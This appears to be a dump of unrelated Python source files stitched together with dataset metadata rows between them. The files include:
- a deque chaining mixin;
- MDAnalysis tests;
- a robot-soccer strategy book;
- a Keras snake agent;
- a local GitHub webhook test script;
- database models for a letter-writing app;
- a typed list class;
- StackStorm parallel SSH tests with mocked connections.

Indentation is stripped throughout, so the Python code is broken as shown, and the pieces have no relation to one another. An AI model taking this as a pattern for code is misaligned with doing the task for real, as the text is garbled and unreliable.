super(_ActiveMixin, self).__init__(incoming, deque(), **kw)
# working things
self._work = deque()
# holding things
self._hold = deque()
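    # Note: ``_chain`` below stacks ``@property`` on ``@contextmanager``, so
    # callers enter it without calling it (``with self._chain: ...``); the
    # code before ``yield`` moves incoming things to working things and the
    # code after ``yield`` flushes holding things to outgoing things.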
@property
@contextmanager
def _chain(self, d=optimize):
# take snapshot
snapshot = d(self._in)
        # rebalance incoming with outgoing
if self._history:
self._in.clear()
self._in.extend(self._out)
# make snapshot original snapshot?
else:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# move incoming things to working things
self._work.extend(self._in)
yield
out = self._out
# clear outgoing things
out.clear()
# extend outgoing things with holding things
out.extend(self._hold)
# clear working things
self._work.clear()
# clear holding things
self._hold.clear()
@property
def _iterable(self):
# derived from Raymond Hettinger Python Cookbook recipe # 577155
call = self._work.popleft
try:
while 1:
yield call()
except IndexError:
pass
def _append(self, thing):
# append thing after other holding things
self._hold.append(thing)
return self
def _xtend(self, things):
# place things after holding things
self._hold.extend(things)
return self
def _prependit(self, things, d=optimize):
# take snapshot
snapshot = d(self._in)
# make snapshot original snapshot?
if self._original is None:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# place thing before other holding things
self._in.extendleft(reversed(things))
return self
def _appendit(self, things, d=optimize):
# take snapshot
snapshot = d(self._in)
# make snapshot original snapshot?
if self._original is None:
self._original = snapshot
# place snapshot at beginning of snapshot stack
self._history.appendleft(snapshot)
# place things after other incoming things
self._in.extend(things)
return self
def _pipeit(self, knife):
knife.clear()
knife._history.clear()
knife._history.extend(self._history)
knife._original = self._original
knife._baseline = self._baseline
knife._out.extend(self._out)
knife._worker = self._worker
knife._args = self._args
knife._kw = self._kw
knife._wrapper = self._wrapper
knife._pipe = self
return knife
def _unpipeit(self):
piped = self._pipe
piped.clear()
piped._history.clear()
piped._history.extend(self._history)
piped._original = self._original
piped._baseline = self._baseline
piped._out.extend(self._out)
piped._worker = self._worker
piped._args = self._args
piped._kw = self._kw
piped._wrapper = self._wrapper
self.clear()
return piped
def _repr(self, clsname_=clsname, list_=list):
# object representation
return self._REPR.format(
self.__module__,
clsname_(self),
list_(self._in),
list_(self._work),
list_(self._hold),
list_(self._out),
)
def _len(self, len=len):
# length of incoming things
return len(self._in)
class _OutMixin(_ActiveMixin):
'''active output mixin'''
def _undo(self, snapshot=0, loads_=loads):
# clear everything
self.clear()
# if specified, use a specific snapshot
if snapshot:
self._history.rotate(-(snapshot - 1))
self._in.extend(loads_(self._history.popleft()))
return self
def _snapshot(self, d=optimize):
# take baseline snapshot of incoming things
self._baseline = d(self._in)
return self
def _rollback(self, loads_=loads):
# clear everything
self.clear()
# clear snapshots
self._clearsp()
# revert to baseline snapshot of incoming things
self._in.extend(loads_(self._baseline))
return self
def _revert(self, loads_=loads):
# clear everything
self.clear()
# clear snapshots
self._clearsp()
# clear baseline
self._baseline = None
# restore original snapshot of incoming things
self._in.extend(loads_(self._original))
return self
def _clear(self, list_=list):
# clear worker
self._worker = None
# clear worker positional arguments
self._args = ()
# clear worker keyword arguments
self._kw = {}
# default iterable wrapper
self._wrapper = list_
# clear pipe
self._pipe = None
# clear incoming things
self._in.clear()
# clear working things
self._work.clear()
# clear holding things
self._hold.clear()
# clear outgoing things
self._out.clear()
return self
def _iterate(self, iter_=iter):
return iter_(self._out)
def _peek(self, len_=len, list_=list):
wrap, out = self._wrapper, self._in
value = list_(wrap(i) for i in out) if self._each else wrap(out)
self._each = False
self._wrapper = list_
return value[0] if len_(value) == 1 else value
def _get(self, len_=len, list_=list):
wrap, out = self._wrapper, self._out
value = list_(wrap(i) for i in out) if self._each else wrap(out)
self._each = False
self._wrapper = list_
return value[0] if len_(value) == 1 else value
| bsd-3-clause | -5,760,023,825,560,073,000 | 28.193694 | 72 | 0.569511 | false |
kain88-de/mdanalysis | testsuite/MDAnalysisTests/analysis/test_persistencelength.py | 1 | 3982 | # -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# MDAnalysis --- http://www.mdanalysis.org
# Copyright (c) 2006-2016 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
from __future__ import print_function, division, absolute_import
import MDAnalysis
from MDAnalysis.analysis import polymer
from MDAnalysis.exceptions import NoDataError
import numpy as np
from numpy.testing import (
assert_,
assert_almost_equal,
assert_raises,
dec
)
from MDAnalysisTests.datafiles import Plength
from MDAnalysisTests import module_not_found
class TestPersistenceLength(object):
def setUp(self):
self.u = MDAnalysis.Universe(Plength)
def tearDown(self):
del self.u
def test_ag_VE(self):
ags = [self.u.atoms[:10], self.u.atoms[10:110]]
assert_raises(ValueError, polymer.PersistenceLength, ags)
def _make_p(self):
ags = [r.atoms.select_atoms('name C* N*')
for r in self.u.residues]
p = polymer.PersistenceLength(ags)
return p
def test_run(self):
p = self._make_p()
p.run()
assert_(len(p.results) == 280)
assert_almost_equal(p.lb, 1.485, 3)
@dec.skipif(module_not_found('scipy'),
"Test skipped because scipy is not available.")
def test_fit(self):
p = self._make_p()
p.run()
p.perform_fit()
assert_almost_equal(p.lp, 6.504, 3)
assert_(len(p.fit) == len(p.results))
@dec.skipif(module_not_found('matplotlib'),
"Test skipped because matplotlib is not available.")
@dec.skipif(module_not_found('scipy'),
"Test skipped because scipy is not available.")
def test_plot_ax_return(self):
'''Ensure that a matplotlib axis object is
returned when plot() is called.'''
import matplotlib
p = self._make_p()
p.run()
p.perform_fit()
actual = p.plot()
expected = matplotlib.axes.Axes
assert_(isinstance(actual, expected))
def test_raise_NoDataError(self):
'''Ensure that a NoDataError is raised if
perform_fit() is called before the run()
method of AnalysisBase.'''
p = self._make_p()
assert_raises(NoDataError, p.perform_fit)
class TestFitExponential(object):
def setUp(self):
self.x = np.linspace(0, 250, 251)
self.a_ref = 20.0
self.y = np.exp(-self.x / self.a_ref)
def tearDown(self):
del self.x
del self.a_ref
del self.y
@dec.skipif(module_not_found('scipy'),
"Test skipped because scipy is not available.")
def test_fit_simple(self):
a = polymer.fit_exponential_decay(self.x, self.y)
assert_(a == self.a_ref)
@dec.skipif(module_not_found('scipy'),
"Test skipped because scipy is not available.")
def test_fit_noisy(self):
noise = np.sin(self.x) * 0.01
y2 = noise + self.y
a = polymer.fit_exponential_decay(self.x, y2)
assert_almost_equal(a, self.a_ref, decimal=3)
#assert_(np.rint(a) == self.a_ref)
| gpl-2.0 | 5,267,376,116,619,991,000 | 31.639344 | 79 | 0.630337 | false |
agingrasc/StrategyIA | ai/STA/Strategy/StrategyBook.py | 1 | 1930 | # Under MIT license, see LICENSE.txt
""" Livre des stratégies. """
from .HumanControl import HumanControl
from .SimpleDefense import SimpleDefense
from .SimpleOffense import SimpleOffense
from .DoNothing import DoNothing
class StrategyBook(object):
"""
    This class can retrieve the strategies registered in the strategy
    configuration and expose them to the Behavior Tree in charge of
    selecting the current strategy.
"""
def __init__(self, p_info_manager):
self.strategy_book = {'SimpleDefense' : SimpleDefense,
'SimpleOffense' : SimpleOffense,
'HumanControl' : HumanControl,
'DoNothing' : DoNothing }
self.info_manager = p_info_manager
def get_strategies_name_list(self):
return list(self.strategy_book.keys())
def ball_in_offense_zone(self):
self.team_zone_side = "left" # constante bidon TODO: trouver une facon de demander au InfoManager notre zone initiale
self.ball_x_position = self.info_manager.get_ball_position().x
if self.team_zone_side == "left":
return self.ball_x_position > 0
return self.ball_x_position < 0
def most_opponents_in_our_zone(self):
pass
def get_optimal_strategy(self):
# simple choice
if self.ball_in_offense_zone():
self.chosen_strategy = SimpleOffense
else:
self.chosen_strategy = SimpleDefense
self.chosen_strategy = DoNothing
return self.chosen_strategy
def get_strategy(self, strategy_name):
return self.strategy_book[strategy_name]
def debug_show_all_players_tactics(self):
for i in range(0,6):
debug_string = ""
debug_string += "Robot:" + str(i) + str(self.info_manager.get_player_tactic(i))
print(debug_string)
| mit | -4,660,321,697,038,851,000 | 33.321429 | 126 | 0.631634 | false |
s-macke/Kerasimo | models/snake.py | 1 | 1336 | from keras.models import Sequential, load_model
from keras.layers import *
from qlearning4k.games import Snake
from keras.optimizers import *
from qlearning4k import Agent
from lib import kerasimo
grid_size = 10
nb_frames = 4
nb_actions = 5
snake = Snake(grid_size)
model = load_model('models/snake.hdf5')
#model = Sequential()
#model.add(Conv2D(16, (3, 3), activation='relu', input_shape=(nb_frames, grid_size, grid_size)))
#model.add(Conv2D(32, (3, 3), activation='relu'))
#model.add(Flatten())
#model.add(Dense(256, activation='relu'))
#model.add(Dense(nb_actions))
#model.compile(RMSprop(), 'MSE')
agent = Agent(model=model, memory_size=-1, nb_frames=nb_frames)
#model.save('/tmp/snake1.hdf5')
#agent.train(snake, batch_size=64, nb_epoch=10000, gamma=0.8)
#model.save('/tmp/snake2.hdf5')
#agent.play(snake)
snake.reset()
agent.clear_frames()
S = agent.get_game_data(snake)
game_over = False
frames = list()
frames.append(S[0])
while not game_over:
q = model.predict(S)[0]
possible_actions = snake.get_possible_actions()
q = [q[i] for i in possible_actions]
action = possible_actions[np.argmax(q)]
snake.play(action)
S = agent.get_game_data(snake)
frames.append(S[0])
game_over = snake.is_over()
print(np.asarray(frames).shape)
kerasimo.ToSVG('snake', model, np.array(frames), showarrows=False, columns=[1,3,3,10,10,1])
| mit | -1,961,486,161,902,618,600 | 28.688889 | 96 | 0.719311 | false |
tasleson/lsm-ci | testing/github_event_gen.py | 1 | 2009 | """
Used for testing the service locally
"""
import argparse
import hashlib
import hmac
import os
import requests
import json
GIT_SECRET = os.getenv("GIT_SECRET", "")
PORT_NUM = os.getenv("PORT_NUM", "43301")
IP_ADDRESS = os.getenv("IP_ADDRESS", "127.0.0.1")
def gen_signature(data):
"""
Generate the signature for the data.
:param data: Data to generate signature for
:return: "sha1=<hexdigest>"
"""
h = hmac.new(GIT_SECRET.encode("utf-8"), data.encode("utf-8"), hashlib.sha1)
s = "sha1=" + h.hexdigest()
return s.encode("utf-8")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="github event creation")
parser.add_argument(
"--clone_url",
dest="clone_url",
default="https://github.com/tasleson/libstoragemgmt.git",
)
parser.add_argument("--branch", dest="branch", default="master")
parser.add_argument(
"--sha1",
dest="sha1",
default="4a956debabed9d02e7c076d85d1f2d18eb11b549",
)
args = parser.parse_args()
url = "http://%s:%s/event_handler" % (IP_ADDRESS, PORT_NUM)
head = {
"Content-type": "application/json",
"X-Hub-Signature": "",
"X-Github-Event": "pull_request",
}
body = dict()
body["pull_request"] = dict()
body["pull_request"]["base"] = dict()
body["pull_request"]["head"] = dict()
body["pull_request"]["base"]["repo"] = dict()
body["pull_request"]["head"]["repo"] = dict()
body["pull_request"]["base"]["repo"][
"full_name"
] = "libstorage/libstoragemgmt"
body["pull_request"]["head"]["repo"]["clone_url"] = args.clone_url
body["pull_request"]["head"]["sha"] = args.sha1
body["pull_request"]["head"]["ref"] = args.branch
body_json = json.dumps(body)
head["X-Hub-Signature"] = gen_signature(body_json)
response = requests.post(
url=url, headers=head, data=body_json.encode("utf-8")
)
print("status = %d" % int(response.status_code))
| apache-2.0 | -6,225,019,245,875,923,000 | 24.75641 | 80 | 0.599303 | false |
mfa/weight-app | weight/manage.py | 1 | 1205 | #!/usr/bin/env python
""" Part of weight_app
:copyright: (c) 2012 by Andreas Madsack.
:license: BSD, see LICENSE for more details.
"""
from flask.ext.script import Manager
from main import create_app, db
from utils import new_pw, get_emailaddress
# flask-Script
manager = Manager(create_app)
@manager.command
def createdb():
""" Create Database (with initial user)
"""
import models
db.create_all()
add_user(u'admin', email=get_emailaddress())
@manager.command
def add_user(username, email, quiet=False):
""" Adds a User to the database with a random password and prints
the random password.
"""
from models import User
if User.query.get(username):
print("User %s already exists!" % username)
return
u = User(username=username,
email=email.strip())
pw = new_pw()
u.set_password(pw)
if not quiet:
print("Password for %s set to: %s" % (username, pw))
db.session.add(u)
db.session.commit()
@manager.command
def import_from_xml(filename, username):
from utils import import_weight_from_xml
import_weight_from_xml(filename, username)
if __name__ == '__main__':
manager.run()
| bsd-3-clause | -5,661,920,201,830,214,000 | 23.591837 | 69 | 0.651452 | false |
jlgoldman/writetogov | database/db_models.py | 1 | 4654 | from geoalchemy2 import Geography
from sqlalchemy.dialects import postgresql
from database import db
from util import fips
from util import text
SRID = 4326
# This table is auto-generated by shp2pgsql based on the TIGER shapefile
# tl_2016_us_cd115.zip (https://www.census.gov/cgi-bin/geo/shapefiles/index.php?year=2016&layergroup=Congressional+Districts+%28115%29).
# We then augment it with additional columns for state
# name and code, since by default it only includes FIPS codes.
#
# Table creation was initiated using:
# shp2pgsql -G -s 4269:4326 tl_2016_us_cd115.shp district > district_raw.sql
#
# Table altered using:
# ALTER TABLE district
# ADD COLUMN state_name character varying(50),
# ADD COLUMN state_code character varying(2),
# ADD COLUMN district_code character varying(4);
# CREATE INDEX idx_district_state_code ON district USING btree (state_code);
# CREATE INDEX idx_district_district_code ON district USING btree (district_code);
#
# Then extra columns are populated using database/populate_district_codes.py
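# Illustrative only (not taken from this repo): with the ``geog`` geography
# column defined below, the district covering a point can be looked up with
# GeoAlchemy2 roughly like this (everything except the column names defined
# here is an assumption):
#   from geoalchemy2.functions import ST_Covers
#   from geoalchemy2.elements import WKTElement
#   point = WKTElement('POINT(%f %f)' % (lon, lat), srid=SRID)
#   district = db.session.query(District).filter(
#       ST_Covers(District.geog, point)).first()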
class District(db.Model):
gid = db.Column(db.Integer, primary_key=True)
statefp = db.Column(db.String(2), index=True) # FIPS code
cd115fp = db.Column(db.String(2), index=True) # FIPS code
# Added manually
state_name = db.Column(db.String(50))
state_code = db.Column(db.String(2), index=True)
district_code = db.Column(db.String(4), index=True)
geoid = db.Column(db.String(4))
namelsad = db.Column(db.String(41))
lsad = db.Column(db.String(2))
cdsessn = db.Column(db.String(3))
mtfcc = db.Column(db.String(5))
funcstat = db.Column(db.String(1))
aland = db.Column(postgresql.DOUBLE_PRECISION)
awater = db.Column(postgresql.DOUBLE_PRECISION)
intptlat = db.Column(db.String(11))
intptlon = db.Column(db.String(12))
geog = db.Column(Geography('MultiPolygon', srid=SRID))
class Rep(db.Model):
class Chamber(object):
HOUSE = 'h'
SENATE = 's'
class Status(object):
ACTIVE = 'a'
LEFT_CONGRESS = 'l'
DEFEATED_IN_GENERAL = 'd'
DEFEATED_IN_PRIMARY = 'e'
RETIRING = 'r'
SEEKING_OTHER_OFFICE = 'o'
PENDING_RESULT = 'p'
rep_id = db.Column(db.Integer, primary_key=True)
first_name = db.Column(db.String(100))
last_name = db.Column(db.String(100))
state_code = db.Column(db.String(2), index=True)
district_number = db.Column(db.Integer, index=True)
district_code = db.Column(db.String(4), index=True)
party_code = db.Column(db.String(1), index=True)
chamber = db.Column(db.String(1), index=True)
email_link = db.Column(db.String(100))
email = db.Column(db.String(100))
website = db.Column(db.String(255))
address_dc = db.Column(db.String(255))
phone_dc = db.Column(db.String(20))
bioguide_id = db.Column(db.String(10))
status = db.Column(db.String(1), index=True)
status_note = db.Column(db.String(100))
def state_name(self):
return fips.get_state_name_for_code(self.state_code)
def district_ordinal(self):
if self.chamber == self.Chamber.HOUSE:
return text.ordinal(self.district_number) if self.district_number > 0 else 'At-Large'
return None
class Reminder(db.Model):
class Frequency(object):
WEEKLY = 'w'
MONTHLY = 'm'
class Status(object):
ACTIVE = 'a'
UNSUBSCRIBED = 'u'
reminder_id = db.Column(db.BigInteger, primary_key=True)
email = db.Column(db.String(100), index=True)
frequency = db.Column(db.String(1), index=True)
status = db.Column(db.String(1), index=True)
last_contacted = db.Column(db.DateTime(timezone=True), index=True)
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
class RepMailing(db.Model):
rep_mailing_id = db.Column(db.BigInteger, primary_key=True)
rep_id = db.Column(db.Integer, index=True)
email = db.Column(db.String(100), index=True)
stripe_charge_id = db.Column(db.String(50), index=True)
lob_letter_id = db.Column(db.String(50), index=True)
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
class Issue(db.Model):
issue_id = db.Column(db.BigInteger, primary_key=True)
creator_email = db.Column(db.String(100), index=True)
creator_name = db.Column(db.String(100))
title = db.Column(db.String(100))
description = db.Column(db.Text)
rep_ids = db.Column(postgresql.ARRAY(db.Integer))
time_created = db.Column(db.DateTime(timezone=True))
time_updated = db.Column(db.DateTime(timezone=True))
| bsd-3-clause | 6,247,504,885,244,312,000 | 37.783333 | 136 | 0.68049 | false |
zbraniecki/pyast | pyast/typedlist.py | 1 | 4961 | import sys
import re
# Temporary solution for string/unicode in py2 vs py3
if sys.version >= '3':
basestring = str
class TypedList(list):
"""Strongly typed list
All elements of the list must be one of the given types.
Attributes:
init - initial values
types - allowed types
null - can the list be null
Types may be either classes or strings. If types are strings then the value
of the field may be only a string matching one of the types.
examples:
TypedList([Identifier(), Identifier()], (Identifier, Literal))
TypedList([], Expression, null=True)
ast.field(["+","-","+"], ("+","-","="))
"""
_type = 'class' # class | str | pattern
def __init__(self, types, init=None, null=False):
super(TypedList, self).__init__()
if isinstance(types, basestring) or not hasattr(types, '__iter__'):
self._types = (types,)
else:
self._types = types
tset = set([type(t) for t in self._types])
self._null = null
if len(tset) == 1:
tset = tset.pop()
self.__enforceType = self.__selectEnforcementMethod(tset)
else:
self.__enforceType = self.__enforceTypeMixed
if init:
self.extend(init)
elif null is False:
raise TypeError("This list must not be empty")
def __repr__(self, template=None):
#fields = self._fields
#if len(field) >= len(list_template):
# list_template += [getfillvalue(self, i)] * (len(field)-len(list_template)+1)
# fields[i] = ''.join(['%s%s' % x for x in zip_longest(
# list_template,
# map(stringify, field),
# fillvalue=''
# )])
#else:
# fields[i] = ', '.join(map(stringify, field))
#return self._template % fields
if template is None:
return list.__repr__(self)
else:
s = template()
return s
def __selectEnforcementMethod(self, t):
if issubclass(t, (basestring, int)):
return self.__enforceTypeStrInt
elif t is re._pattern_type:
return self.__enforceTypePattern
elif isinstance(t, type):
return self.__enforceTypeClass
def __enforceTypeMixed(self, items):
res = []
for item in items:
et = self.__selectEnforcementMethod(type(item))
res.append(et((item,)))
if all(res):
return
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypeStrInt(self, items):
if all(i in self._types for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypeClass(self, items):
if all(isinstance(i, self._types) for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def __enforceTypePattern(self, items):
if all(any(j.match(i) for j in self._types) for i in items):
return True
raise TypeError('This list accepts only elements: %s' %
', '.join([str(t) for t in self._types]))
def append(self, item):
self.__enforceType((item,))
return super(TypedList, self).append(item)
def insert(self, pos, item):
self.__enforceType((item,))
return super(TypedList, self).insert(pos, item)
def extend(self, items):
self.__enforceType(items)
return super(TypedList, self).extend(items)
def pop(self, key=-1):
if self._null is False and len(self) == 1:
raise TypeError("This list must not be empty")
return super(TypedList, self).pop(key)
def __delitem__(self, k):
if self._null is False:
if type(k) is slice:
absslice = k.indices(len(self))
if absslice[1] - absslice[0] >= len(self):
raise TypeError("This list must not be empty")
elif len(self) == 1:
raise TypeError("This list must not be empty")
return list.__delitem__(self, k)
def __setitem__(self, key, value):
self.__enforceType(value if hasattr(value, '__iter__') else (value,))
return list.__setitem__(self, key, value)
def __setslice__(self, i, j, sequence):
self.__enforceType(sequence)
return list.__setslice__(self, i, j, sequence)
def __delslice__(self, i, j):
absslice = slice(i, j).indices(len(self))
if self._null is False and absslice[1] - absslice[0] >= len(self):
raise TypeError("This list must not be empty")
return list.__delslice__(self, i, j)
| bsd-3-clause | -4,534,332,588,961,025,000 | 33.93662 | 89 | 0.549083 | false |
chetan/cherokee | admin/PageNewConfig.py | 1 | 5653 | # -*- coding: utf-8 -*-
#
# Cherokee-admin
#
# Authors:
# Alvaro Lopez Ortega <[email protected]>
# Taher Shihadeh <[email protected]>
#
# Copyright (C) 2001-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
import Page
import Cherokee
import os
from config_version import config_version_get_current
from consts import *
from configured import *
URL_BASE = '/create_config'
URL_APPLY = '/create_config/apply'
HELPS = [('index', N_("Index"))]
NOTE_LOADING = N_("Loading new configuration file..")
WARNING_NOT_FOUND = N_("<b>The configuration is not found</b>.<br />You can create a new configuration file and proceed to customize the web server.")
DEFAULT_PID_LOCATIONS = [
'/var/run/cherokee.pid',
os.path.join (PREFIX, 'var/run/cherokee.pid')
]
CHEROKEE_MIN_DEFAULT_CONFIG = """# Default configuration
server!pid_file = %s
vserver!1!nick = default
vserver!1!document_root = /tmp
vserver!1!rule!1!match = default
vserver!1!rule!1!handler = common
""" % (DEFAULT_PID_LOCATIONS[0])
class ConfigCreator:
def __call__ (self, profile):
if profile == 'regular':
return self._create_config ("cherokee.conf.sample")
elif profile == 'static':
return self._create_config ("performance.conf.sample")
elif profile == 'development':
re = self._create_config ("cherokee.conf.sample")
if not re:
return False
self._tweak_config_for_dev()
return True
def _create_config (self, template_file):
file = CTK.cfg.file
if os.path.exists (file):
return True
dirname = os.path.dirname(file)
if dirname and not os.path.exists (dirname):
try:
os.mkdir (dirname)
except:
print "ERROR: Could not create directory '%s'" %(dirname)
return False
content = "config!version = %s\n" %(config_version_get_current())
conf_sample = os.path.join(CHEROKEE_ADMINDIR, template_file)
if os.path.exists (conf_sample):
content += open(conf_sample, 'r').read()
else:
content += CHEROKEE_MIN_DEFAULT_CONFIG
try:
f = open(file, 'w+')
f.write (content)
f.close()
except:
print "ERROR: Could not open '%s' for writing" %(file)
return False
CTK.cfg.load()
return True
def _tweak_config_for_dev (self):
del(CTK.cfg['server!bind'])
del(CTK.cfg['server!pid_file'])
del(CTK.cfg['vserver!1!logger'])
CTK.cfg['server!bind!1!port'] = "1234"
CTK.cfg['server!log_flush_lapse'] = "0"
CTK.cfg['vserver!1!rule!5!handler!type'] = "normal"
CTK.cfg['vserver!1!error_writer!type'] = "stderr"
CTK.cfg['source!2!type'] = "host"
CTK.cfg['source!2!nick'] = "localhost 8000"
CTK.cfg['source!2!host'] = "localhost:8000"
CTK.cfg.save()
def apply():
creator = ConfigCreator()
profile = CTK.post.pop('create')
if creator (profile):
return CTK.cfg_reply_ajax_ok()
return {'ret': 'fail'}
class Form (CTK.Container):
def __init__ (self, key, name, label, **kwargs):
CTK.Container.__init__ (self, **kwargs)
box = CTK.Box({'class': 'create-box %s' %(key)})
box += CTK.RawHTML('<h3>%s</h3>' %(name))
box += CTK.RawHTML('<span>%s</span>' %(label))
submit = CTK.Submitter(URL_APPLY)
submit += CTK.Hidden('create', key)
submit += CTK.SubmitterButton (_('Create'))
submit.bind ('submit_success',
"$('#main').html('<h1>%s</h1>');"%(NOTE_LOADING) + CTK.JS.GotoURL('/'))
box += submit
box += CTK.RawHTML('<div class="ui-helper-clearfix"></div>')
self += box
class Render:
def __call__ (self):
container = CTK.Container()
container += CTK.RawHTML("<h2>%s</h2>" %(_('Create a new configuration file:')))
key = 'regular'
name = _('Regular')
label = _('Regular configuration: Apache logs, MIME types, icons, etc.')
container += Form (key, name, label)
key = 'static'
name = _('Static Content')
label = _('Optimized to send static content.')
container += Form (key, name, label)
key = 'development'
name = _('Server Development')
label = _('No standard port, No log files, No PID file, etc.')
container += Form (key, name, label)
page = Page.Base(_('New Configuration File'), body_id='new-config', helps=HELPS)
page += CTK.RawHTML("<h1>%s</h1>" %(_('Configuration File Not Found')))
page += CTK.Notice ('warning', CTK.RawHTML(_(WARNING_NOT_FOUND)))
page += CTK.Indenter (container)
return page.Render()
CTK.publish ('^%s'%(URL_BASE), Render)
CTK.publish ('^%s'%(URL_APPLY), apply, method="POST")
| gpl-2.0 | 1,322,259,753,467,315,200 | 29.89071 | 150 | 0.587122 | false |
emedvedev/st2 | st2actions/tests/unit/test_parallel_ssh.py | 1 | 11187 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from mock import (patch, Mock, MagicMock)
import unittest2
from st2actions.runners.ssh.parallel_ssh import ParallelSSHClient
from st2actions.runners.ssh.paramiko_ssh import ParamikoSSHClient
from st2actions.runners.ssh.paramiko_ssh import SSHCommandTimeoutError
import st2tests.config as tests_config
tests_config.parse_args()
class ParallelSSHTests(unittest2.TestCase):
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_connect_with_password(self):
hosts = ['localhost', '127.0.0.1']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
password='ubuntu',
connect=False)
client.connect()
expected_conn = {
'allow_agent': False,
'look_for_keys': False,
'password': 'ubuntu',
'username': 'ubuntu',
'timeout': 60,
'port': 22
}
for host in hosts:
expected_conn['hostname'] = host
client._hosts_client[host].client.connect.assert_called_once_with(**expected_conn)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_connect_with_random_ports(self):
hosts = ['localhost:22', '127.0.0.1:55', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
password='ubuntu',
connect=False)
client.connect()
expected_conn = {
'allow_agent': False,
'look_for_keys': False,
'password': 'ubuntu',
'username': 'ubuntu',
'timeout': 60,
'port': 22
}
for host in hosts:
hostname, port = client._get_host_port_info(host)
expected_conn['hostname'] = hostname
expected_conn['port'] = port
client._hosts_client[hostname].client.connect.assert_called_once_with(**expected_conn)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_connect_with_key(self):
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=False)
client.connect()
expected_conn = {
'allow_agent': False,
'look_for_keys': False,
'key_filename': '~/.ssh/id_rsa',
'username': 'ubuntu',
'timeout': 60,
'port': 22
}
for host in hosts:
hostname, port = client._get_host_port_info(host)
expected_conn['hostname'] = hostname
expected_conn['port'] = port
client._hosts_client[hostname].client.connect.assert_called_once_with(**expected_conn)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_connect_with_bastion(self):
hosts = ['localhost', '127.0.0.1']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
bastion_host='testing_bastion_host',
connect=False)
client.connect()
for host in hosts:
hostname, _ = client._get_host_port_info(host)
self.assertEqual(client._hosts_client[hostname].bastion_host, 'testing_bastion_host')
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, 'run', MagicMock(return_value=('/home/ubuntu', '', 0)))
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_run_command(self):
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
client.run('pwd', timeout=60)
expected_kwargs = {
'timeout': 60
}
for host in hosts:
hostname, _ = client._get_host_port_info(host)
client._hosts_client[hostname].run.assert_called_with('pwd', **expected_kwargs)
@patch('paramiko.SSHClient', Mock)
@patch.object(ParamikoSSHClient, '_is_key_file_needs_passphrase',
MagicMock(return_value=False))
def test_run_command_timeout(self):
        # Make sure stdout and stderr are included on timeout
hosts = ['localhost', '127.0.0.1', 'st2build001']
client = ParallelSSHClient(hosts=hosts,
user='ubuntu',
pkey_file='~/.ssh/id_rsa',
connect=True)
mock_run = Mock(side_effect=SSHCommandTimeoutError(cmd='pwd', timeout=10,
stdout='a',
stderr='b'))
for host in hosts:
hostname, _ = client._get_host_port_info(host)
host_client = client._hosts_client[host]
host_client.run = mock_run
results = client.run('pwd')
for host in hosts:
result = results[host]
self.assertEqual(result['failed'], True)
self.assertEqual(result['stdout'], 'a')
